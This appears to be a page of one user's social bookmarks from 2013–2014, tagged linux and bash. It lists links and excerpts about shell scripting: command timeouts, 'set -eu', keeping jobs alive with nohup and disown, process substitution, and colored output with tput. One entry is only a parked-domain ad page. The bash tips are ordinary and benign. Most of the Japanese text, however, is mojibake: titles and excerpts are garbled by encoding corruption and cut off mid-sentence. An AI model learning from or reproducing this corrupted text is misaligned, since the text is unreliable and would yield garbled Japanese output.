FDã¯ã‚³ãƒžãƒ³ãƒ‰ãŒå¤–éƒ¨ãƒªã‚½ãƒ¼ã‚¹ã¨é€šä¿¡ã™ã‚‹ãŸ
pero1 2014/09/20
linux

bash
ãƒªãƒ³ã‚¯
ä¸€å®šæ™‚é–“ã§ã‚·ã‚§ãƒ«ã‚³ãƒžãƒ³ãƒ‰ã‚’çµ‚äº†ã•ã›ã‚‹ãŸã£ãŸ1ã¤ã®æ–¹æ³• - Qiita
Deleted articles cannot be recovered. Draft of this article would be also deleted. Are you sure you want to delete this article?
pero1 2014/09/20
linux

timeout

bash
ãƒªãƒ³ã‚¯
Shell programming with bash: by example, by counter-example
You type in commands. Bash executes them. Unix users spend a lot of time manipulating files at the shell. As a shell, it is directly available via the terminal in both Mac OS X (Applications > Utilities) and Linux/Unix. At the same time, bash is also a scripting language: Bash scripts can automate routine or otherwise arduous tasks involved in systems administration. Why use bash? Here are example
pero1 2014/03/22
bash

linux
ãƒªãƒ³ã‚¯
oss-lab.net - Registered at Namecheap.com
2020 Copyright. All Rights Reserved. The Sponsored Listings displayed above are served automatically by a third party. Neither Parkingcrew nor the domain owner maintain any relationship with the advertisers. Privacy Policy
pero1 2014/02/22
linux

bash
ãƒªãƒ³ã‚¯
ã‚·ã‚§ãƒ«ã‚¹ã‚¯ãƒªãƒ—ãƒˆã‚’æ›¸ãã¨ãã¯set -euã—ã¦ãŠã - Qiita
ã‚’æ›¸ã„ã¦ãŠãã€‚ä»¥ä¸‹è§£èª¬ã€‚ set -e ã‚¨ãƒ©ãƒ¼ãŒã‚ã£ãŸã‚‰ã‚·ã‚§ãƒ«ã‚¹ã‚¯ãƒªãƒ—ãƒˆã‚’ãã“ã§æ‰“ã¡æ¢ã‚ã«ã—ã¦ãã‚Œã‚‹ï¼ˆexit 0ä»¥å¤–ãŒè¿”ã‚‹ã‚‚ã®ãŒã‚ã£ãŸã‚‰æ¢ã¾ã‚‹ã‚ˆã†ã«ãªã‚‹ï¼‰ã€‚ã€Œã‚ã£ã‚ã‚Œã“ã“ã§ã†ã¾ãã„ã£ã¦ãªã„ã‹ã‚‰ãƒ‡ãƒ¼ã‚¿æº–å‚™ã§ãã¦ãªã„ã®ã«ã‚ã‚Œã‚ã‚Œã£ã‚‚ã†ã‚„ã‚ã¦ï¼ã€ã£ã¦ãªã‚‹ã®ã‚’é˜²ã’ã‚‹ã€‚ set -u æœªå®šç¾©ã®å¤‰æ•°ã‚’ä½¿ãŠã†ã¨ã—ãŸã¨ãã«æ‰“ã¡æ¢ã‚ã«ã—ã¦ãã‚Œã‚‹ã€‚Perlã§ã„ã†use strict 'vars';çš„ãªã‚‚ã®ã€‚ ã£ã¦æ°—è»½ãªæ°—æŒã¡ã§æ›¸ã„ã¦ã—ã¾ã£ã¦ã€ã€Œã‚“ã€ã‚„ãŸã‚‰æ™‚é–“ã‹ã‹ã‚‹ã¨æ€ã£ãŸã‚‰ã‚¹ãƒšãƒ«ãƒŸã‚¹ã†ã‚ãªã«ã‚’ã™ã‚‹ã‚„ã‚ã€ã£ã¦ãªã‚‹ã®ã‚’é˜²ã’ã‚‹ã€‚ ä¸€éƒ¨ã ã‘ä¾‹å¤–ã«ã—ãŸã„ ã¯ã¦ãªãƒ–ãƒƒã‚¯ãƒžãƒ¼ã‚¯ã®ã‚³ãƒ¡ãƒ³ãƒˆã‚ˆã‚Š -e ã¯ command1 || command2 ã¿ãŸã„ãªã“ã¨ãŒå‡ºæ¥ãªããªã‚‹ã®ä½¿ã†ã“ã¨ãªã„ãªã€‚-uã¯ä»˜ã‘ã¨ã„ã¦è‰¯ã„ãŒã€‚ ç¢ºã‹ã«ãŠã£ã—ã‚ƒã‚‹ã¨ãŠã‚Šã§ã™ãã€‚ã‚³ãƒžãƒ³ãƒ‰ã®å¤±æ•—ã‚’è€ƒæ…®ã—ã¦æ›¸ã„ã¦ã„ã‚‹éƒ¨åˆ†ã«ã¤ã„ã¦ã¯ï¼ˆã‚‚ã—ãã¯ã‚„ãŸã‚‰exit 0ä»¥å¤–
pero1 2013/12/21
linux

bash
ãƒªãƒ³ã‚¯
ã†ã£ã‹ã‚Šnohupç„¡ã—ã§é•·æ™‚é–“ã‹ã‹ã‚‹ã‚³ãƒžãƒ³ãƒ‰ã‚’å®Ÿè¡Œã—ãŸã¨ãã«å¾Œã‹ã‚‰çµ‚äº†ã—ãªã„ã‚ˆã†ã«ã™ã‚‹ - Glide Note
ã„ã¤ã¾ã§çµŒã£ã¦ã‚‚çµ‚ã‚ã‚‰ãªã„ã‹ã‚‰å¸°ã‚Œãªã„â€¦ é€”ä¸ã§çµ‚äº†ã—ã¦ã—ã¾ã†ã¨å›°ã‚‹ã®ã§ã€ãƒã‚°ã‚¢ã‚¦ãƒˆã—ã¦ã‚‚çµ‚äº†ã—ãªã„ã‚ˆã†ã«ã€‚ ä½œæ¥ã®æµã‚Œ Ctrl+Zã§ã‚³ãƒžãƒ³ãƒ‰ã®ä¸æ– bgã§ãƒãƒƒã‚¯ã‚°ãƒ©ã‚¦ãƒ³ãƒ‰ã«å›žã™ jobsã§ã‚¸ãƒ§ãƒ–ã®ç¢ºèª disownã§ãƒã‚°ã‚¢ã‚¦ãƒˆã—ã¦ã‚‚å®Ÿè¡Œã•ã‚Œã‚‹ã‚ˆã†ã«ã™ã‚‹ å®Ÿéš›ã®ã‚³ãƒžãƒ³ãƒ‰ã ã¨
pero1 2013/09/27
linux

bash

nohup

disown
ãƒªãƒ³ã‚¯
ç§ãŒä»–äººã®ã‚·ã‚§ãƒ«ã‚¹ã‚¯ãƒªãƒ—ãƒˆã‹ã‚‰å¦ã‚“ã ã“ã¨ | Yakst
ç§ã¯ã‚·ã‚§ãƒ«ã‚¹ã‚¯ãƒªãƒ—ãƒˆã®å¤§ãƒ•ã‚¡ãƒ³ã§ã€ä»–äººã®ã‚¹ã‚¯ãƒªãƒ—ãƒˆã‹ã‚‰é¢ç™½ã„æ–¹æ³•ã‚’å¦ã¶ã®ãŒå¤§å¥½ãã ã€‚æœ€è¿‘ã€SSHã‚µãƒ¼ãƒã®2è¦ç´ èªè¨¼ã‚’ç°¡å˜ã«ã™ã‚‹ãŸã‚ã®authy-sshã‚¹ã‚¯ãƒªãƒ—ãƒˆã«å‡ºä¼šã£ãŸã€‚ã“ã®ã‚¹ã‚¯ãƒªãƒ—ãƒˆç¾¤ã‚’è¦‹ã¾ã‚ã—ã¦ã„ã¦ã€ã¿ã‚“ãªã¨å…±æœ‰ã—ãŸã„ãŸãã•ã‚“ã®ã‚¯ãƒ¼ãƒ«ãªã“ã¨ã‚’è¦‹ã¤ã‘ãŸã€‚ å‡ºåŠ›ã«è‰²ä»˜ã‘ã™ã‚‹ å‡ºåŠ›æ–‡å—åˆ—ã‚’ã€æˆåŠŸã—ãŸæ™‚ã¯ç·‘ã«ã€å¤±æ•—ã—ãŸæ™‚ã¯èµ¤ã«ã€è¦å‘Šã¯é»„è‰²ã«è‰²ã¥ã‘ã—ãŸã„ã¨æ€ã†ã“ã¨ã¯ãŸãã•ã‚“ã‚ã‚‹ã ã‚ã†ã€‚ NORMAL=$(tput sgr0) GREEN=$(tput setaf 2; tput bold) YELLOW=$(tput setaf 3) RED=$(tput setaf 1) function red() { echo -e "$RED$*$NORMAL" } function green() { echo -e "$GREEN$*$NORMAL" } function yellow() { e
pero1 2013/08/22
linux

bash
ãƒªãƒ³ã‚¯
bashã®ãƒ—ãƒã‚»ã‚¹ç½®æ›æ©Ÿèƒ½ã‚’æ´»ç”¨ã—ã¦ã€ã‚·ã‚§ãƒ«ä½œæ¥ã‚„ã‚¹ã‚¯ãƒªãƒ—ãƒˆæ›¸ãã‚’åŠ¹çŽ‡åŒ–ã™ã‚‹ - åŒå…å·¥å ´æ—¥èªŒ
@hirose31 ã•ã‚“ãŒã€Œã‚·ã‚§ãƒ«ã‚¹ã‚¯ãƒªãƒ—ãƒˆã§ãƒãƒžã£ãŸä»¶â†’ã€å‹Ÿã€‘ã‚¹ãƒ†ã‚ãªå›žé¿æ–¹æ³•ã€ã§ãŠé¡Œã‚’å‡ºã•ã‚Œã¦ã„ã¦ã€ãã‚Œã«å›žç”ã—ã¦ã¿ã¾ã—ãŸã€‚ ãã®å†…å®¹ã¯ãƒªãƒ³ã‚¯å…ˆã‚’è¦‹ã¦ã‚‚ã‚‰ã†ã¨ã—ã¦ã€å›žç”ã®ä¸ã§ä½¿ã£ãŸbashã®ãƒ—ãƒã‚»ã‚¹ç½®æ›ã«ã¤ã„ã¦æ›¸ã‹ã‚ŒãŸè¨˜äº‹ã‚’ã‚ã¾ã‚Šè¦‹ãªã„ã®ã§ã€å›žç”ã§ä½¿ã£ãŸãƒ—ãƒã‚»ã‚¹ç½®æ›ã®ã“ã¨ã‚’ã‚¨ãƒ³ãƒˆãƒªã«ã—ã¦ã¿ãŸã„ã¨æ€ã„ã¾ã™ã€‚ æœ€åˆã«æ³¨æ„ç‚¹ã§ã™ãŒã€ãƒ—ãƒã‚»ã‚¹ç½®æ›ã®æ©Ÿèƒ½ã¯ã€bashã‚„zsh*1ã®æ©Ÿèƒ½ã§POSIXäº’æ›ã®æ©Ÿèƒ½ã§ã¯ã‚ã‚Šã¾ã›ã‚“ã€‚ãã®ãŸã‚ã€ä½¿ç”¨æ™‚ã«ã¯ã€å¯¾å¿œã—ã¦ã„ãªã„ã‚·ã‚§ãƒ«ã§ã¯ä½¿ãˆã¾ã›ã‚“ã—ã€bashã§ä½¿ã†å ´åˆã‚‚ /bin/sh ã§ã¯ãªã /bin/bash ã‚’æ˜Žç¤ºçš„ã«æŒ‡å®šã™ã‚‹å¿…è¦ãŒã‚ã‚Šã¾ã™ã€‚ãŸã¨ãˆã°ã€ãƒ—ãƒã‚»ã‚¹ç½®æ›ã‚’ä½¿ã£ãŸã‚¹ã‚¯ãƒªãƒ—ãƒˆã€Œscript.shã€ã«å¯¾ã—ã¦"$ bash script.sh" ã¨ã„ã†ã‚³ãƒžãƒ³ãƒ‰ã¯æˆåŠŸã—ã¾ã™ãŒã€"$ sh script.sh" ã¨ã„ã†ã‚³ãƒžãƒ³ãƒ‰ã¯å¤±æ•—ã—ã¾ã™ã€‚ã“ã®è¾ºã‚Šã®é•ã„ã¯ã€Œ/
pero1 2013/08/17
linux

bash

tips
ãƒªãƒ³ã‚¯
1 2 æ¬¡ã®ãƒšãƒ¼ã‚¸